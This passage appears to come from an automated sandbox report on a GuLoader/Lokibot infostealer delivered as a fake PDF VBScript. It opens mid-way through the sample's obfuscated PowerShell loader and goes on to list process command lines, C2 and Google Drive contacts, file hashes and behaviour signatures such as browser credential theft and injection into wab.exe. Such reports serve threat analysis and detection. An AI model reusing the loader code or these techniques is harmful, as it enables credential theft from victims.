UdriaTlperl,fgru:Pu poB EnsclCedery Ddvga SalanGastrtAct ns Bl.btDespoeHorotgWeep,nC,nteiFals nc.dgegAn.toeSphenrSte,lsBunde1P,lar5Halvf8Fsteb=organ$Ve det RdstrBr,deuFuldgeSelvf ') ;Respirableness $theriatrics;Respirableness (splenoid ' gonaSWooletTrochaFi,hfr JametPortn-RimosSBoblel UndeeAutotePateepR,ngr Pa,fu4 Smaa ');Respirableness (splenoid 'Aquam$ vanggCaliflSyrinoPull.bStetiaNic.elUndut:SprogBTortue.vergtIsblooColomnCrot.h IniajRvertt P lat StueaStepslBurneeKume,rSu beePolli=Liqui( M.scTTronseUma ds abletcyke -NonemPTriataPhyl,tS,perhunves Pr,se$ fterTUnacceSeksurF emtrStveknGidsesAg.rhp Nonio Opspr Stumt Poss)Un nn ') ;Respirableness (splenoid 'Slgte$KursugUdrinltoccaoTaboob HoveaDimyalanne :BegaaCOvercaEarwiuIndskd DeklaS,hygd Opsl= Ambl$ PaafgvremalShelloFredsbAn,ryaFl.tal Evis:ElecaSNon,nkAlgr,iKemotfsemeitill.gnDittoiSolrinUd.ang.verde Anner .eha+.etal+ Blom% samm$hostiMForsraDiscoiStatsuDies sKeel .Liebhc Basso UndduRestinAmmontSnned ') ;$dekodningerne=$Maius[$Caudad];}$Nummererende=294536;$Supraliminally=29024;Respirableness (splenoid ' Batt$Orde gEnerglKadi oAnsigbVicara Ma,klUnser:B digS onopc ryserBekenuSk mab Enfrb DiffeProcrd G in sult.=Davyn Anar,GAfg.deTidsftA.lsn-M.eloCnone oPhlebnUntuctSubdueUn.onnFirsptP ill Jat $quantT,ikkeeFod ir jenerFilnunFortisSko epKo oroSt.kvrStrobtFyrre ');Respirableness (splenoid 'Udbr $ForulgSundhlBurglo Afspb Embea .fvelEdi h:,jhusWPiberiSkoletLe annPacoteDemeasRaa.asEmcumdJeka.o M.ssm Patr Anti.=Druel Danma[RangeSFir.oySn,lespuffit Noveeunowim Unh .aktieCPersooaksennKumbivMorale ,rthrSkytstKnapn]Bl ms: tris:ScantFMmetprContro BlitmPrmieBflyboaNazilsMarieePhleb6 Noct4traumSKuli.tSomatrRegi.iUnre nKredigEthic(Pat,r$E usiSSpo.scV.rderGene,uBrodkbLicanbBakkeeJeme,d Udsp)Sympa ');Respirableness (splenoid 'Passi$T,ndkg.alstlregeloCaddibBj,nca PreelLynne:BlindsUncomkBastaoUdspevLethelPlastbHaloge ForgrMartyh MultuKug,es.tilge.ssidnA,amoewryscsBo an Vergi=H ndu Fedt[HavreSTegn yKonvosAmonttTurcyeCharim Talj. 
S.orTJackpeOp.urxUrtidt gere.PseudEBibehn StatcEuskaoZ lpadTearpi.liffnFerskgTil.t]Info,:med.o:CircuAEl,veSAntagC afgiI Bj,eI ,onk.Skru GUngire.ullat odspSNe vutSci,nr MarliUnmaln,piksgHurti(opmun$Sc,usWVacc.iBlandtStilanOpsige Ne,us,anuasGtetpdOverco,ykedmPulte) ,ycl ');Respirableness (splenoid 'Tn,so$,ividgOmdi.lMethyostjkibPenitaUnenflFriki:G undA HaftfBandpp eburTeenav ji.se MeritHollu=tidss$FragisSe chk MuffoMeninvApartlconchb N.ndeMiljprCongihBiochuDunlisSkr.be RunwnHaymaeFontas Hoft.Bipa sMonocuDagtub,ackbss ogrtTransrSammei hersnstreggSejll(.egns$HjemvNAlko.uUfredmSubgwmIndfae Pia,rP pileUdtjerDiskeeAfasin Roardudtjee Revi,,yssa$Mis,eS Afsku Fly pReaktr Massa dvilcund iTaxammBost,iDigitnSlidsaOvergl allflPlastyLepid)Barke ');Respirableness $Afprvet;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4068 -ip 4068
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4068 -s 1728
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.179.227:80 | o.pki.goog | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.170.16.2.in-addr.arpa | udp |
| US | 137.184.191.215:80 | 137.184.191.215 | tcp |
| US | 8.8.8.8:53 | 215.191.184.137.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.191.184.137.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
memory/3976-4-0x00007FFCF89A3000-0x00007FFCF89A5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qihdvnke.0tz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3976-14-0x0000027C242C0000-0x0000027C242E2000-memory.dmp
memory/3976-15-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/3976-16-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/3976-18-0x00007FFCF89A3000-0x00007FFCF89A5000-memory.dmp
memory/3976-19-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/4664-21-0x00000000027B0000-0x00000000027E6000-memory.dmp
memory/4664-22-0x0000000005230000-0x0000000005858000-memory.dmp
memory/4664-23-0x00000000051E0000-0x0000000005202000-memory.dmp
memory/4664-24-0x00000000058D0000-0x0000000005936000-memory.dmp
memory/4664-25-0x0000000005940000-0x00000000059A6000-memory.dmp
memory/4664-35-0x0000000005A70000-0x0000000005DC4000-memory.dmp
memory/4664-36-0x00000000060B0000-0x00000000060CE000-memory.dmp
memory/4664-37-0x00000000060F0000-0x000000000613C000-memory.dmp
memory/4664-39-0x0000000006640000-0x000000000665A000-memory.dmp
memory/4664-38-0x0000000007A50000-0x00000000080CA000-memory.dmp
memory/4664-41-0x00000000072D0000-0x00000000072F2000-memory.dmp
memory/4664-40-0x00000000073D0000-0x0000000007466000-memory.dmp
memory/4664-42-0x00000000080D0000-0x0000000008674000-memory.dmp
C:\Users\Admin\AppData\Roaming\Carbines.Que
| MD5 | fed7d2b1a62075a148249e5d86063b30 |
| SHA1 | f2e3c9605313437d6dc1668982f8d8c21d42d75d |
| SHA256 | c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba |
| SHA512 | 66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450 |
memory/4664-44-0x0000000008680000-0x000000000C1EE000-memory.dmp
memory/3976-61-0x00007FFCF89A0000-0x00007FFCF9461000-memory.dmp
memory/4068-58-0x00000000012C0000-0x0000000004E2E000-memory.dmp
memory/4068-72-0x00000000012C0000-0x0000000004E2E000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-09 19:32
Reported
2024-09-09 19:35
Platform
win7-20240704-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Guloader,Cloudeye
Lokibot
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2216 set thread context of 2780 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BID REQUEST 09-09-2024·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Carbines.Que && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| GB | 216.58.201.110:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.179.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.179.227:80 | o.pki.goog | tcp |
| GB | 142.250.179.225:443 | drive.usercontent.google.com | tcp |
| US | 137.184.191.215:80 | 137.184.191.215 | tcp |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 92.123.143.234:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab780F.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
memory/2616-20-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp
memory/2616-23-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-22-0x0000000002820000-0x0000000002828000-memory.dmp
memory/2616-21-0x000000001B600000-0x000000001B8E2000-memory.dmp
memory/2616-25-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-24-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-26-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-27-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-28-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp
memory/2616-30-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2616-31-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OEV9XBIIGR3TUWYFZ422.temp
| MD5 | 2488869d637c1979b85bc2adf1a09838 |
| SHA1 | 5873bd01769014537e1f431166a56c9343d16482 |
| SHA256 | 3ca1bafa69f871eeb5bd84f75c9cebeb2b36dd1a6f4b3294c2ae6239b89d7f2c |
| SHA512 | f0c13acf7a93b6760b3033cbad522e66b44f4ba05d1bbffa6bb3113b4397612661d585297e364679f516ca178f911152bd727b34d62f30d3f96e8fbb920bc13a |
C:\Users\Admin\AppData\Roaming\Carbines.Que
| MD5 | fed7d2b1a62075a148249e5d86063b30 |
| SHA1 | f2e3c9605313437d6dc1668982f8d8c21d42d75d |
| SHA256 | c31da00f237eeb4bc98b2d1396d5bdb56c51c18d4ede431dcd6049e4a78f18ba |
| SHA512 | 66f6fa6b5af2c09bee449cc9560194fa82a23affc4c90e2e3698458fab319a50163f5b581e8ff734dd7de6d0a12151d10c0b6011f3346f6568becc6707675450 |
memory/2216-36-0x00000000066B0000-0x000000000A21E000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c790bcec6427196cca8456a5b1a49079 |
| SHA1 | 3017bf045ad2a9e9aae55ad3068a61ca02560fe5 |
| SHA256 | a98e8d1290535bda036224cadfe388d7dc62a49e3f0e08f7dd0f524f886ad413 |
| SHA512 | f2ab548a685e42d571ea6dde413ca34ed6db61de0ad145b4df87e390b25363d0f05fd851740c4fd3ccc4c2774f82a49d25c8e2c8c75077d49cc94f6964f64a7f |
C:\Users\Admin\AppData\Local\Temp\Tar10D3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2780-60-0x0000000000400000-0x0000000000581000-memory.dmp
memory/2780-61-0x0000000000AF0000-0x000000000465E000-memory.dmp
memory/2616-62-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
memory/2780-70-0x0000000000AF0000-0x000000000465E000-memory.dmp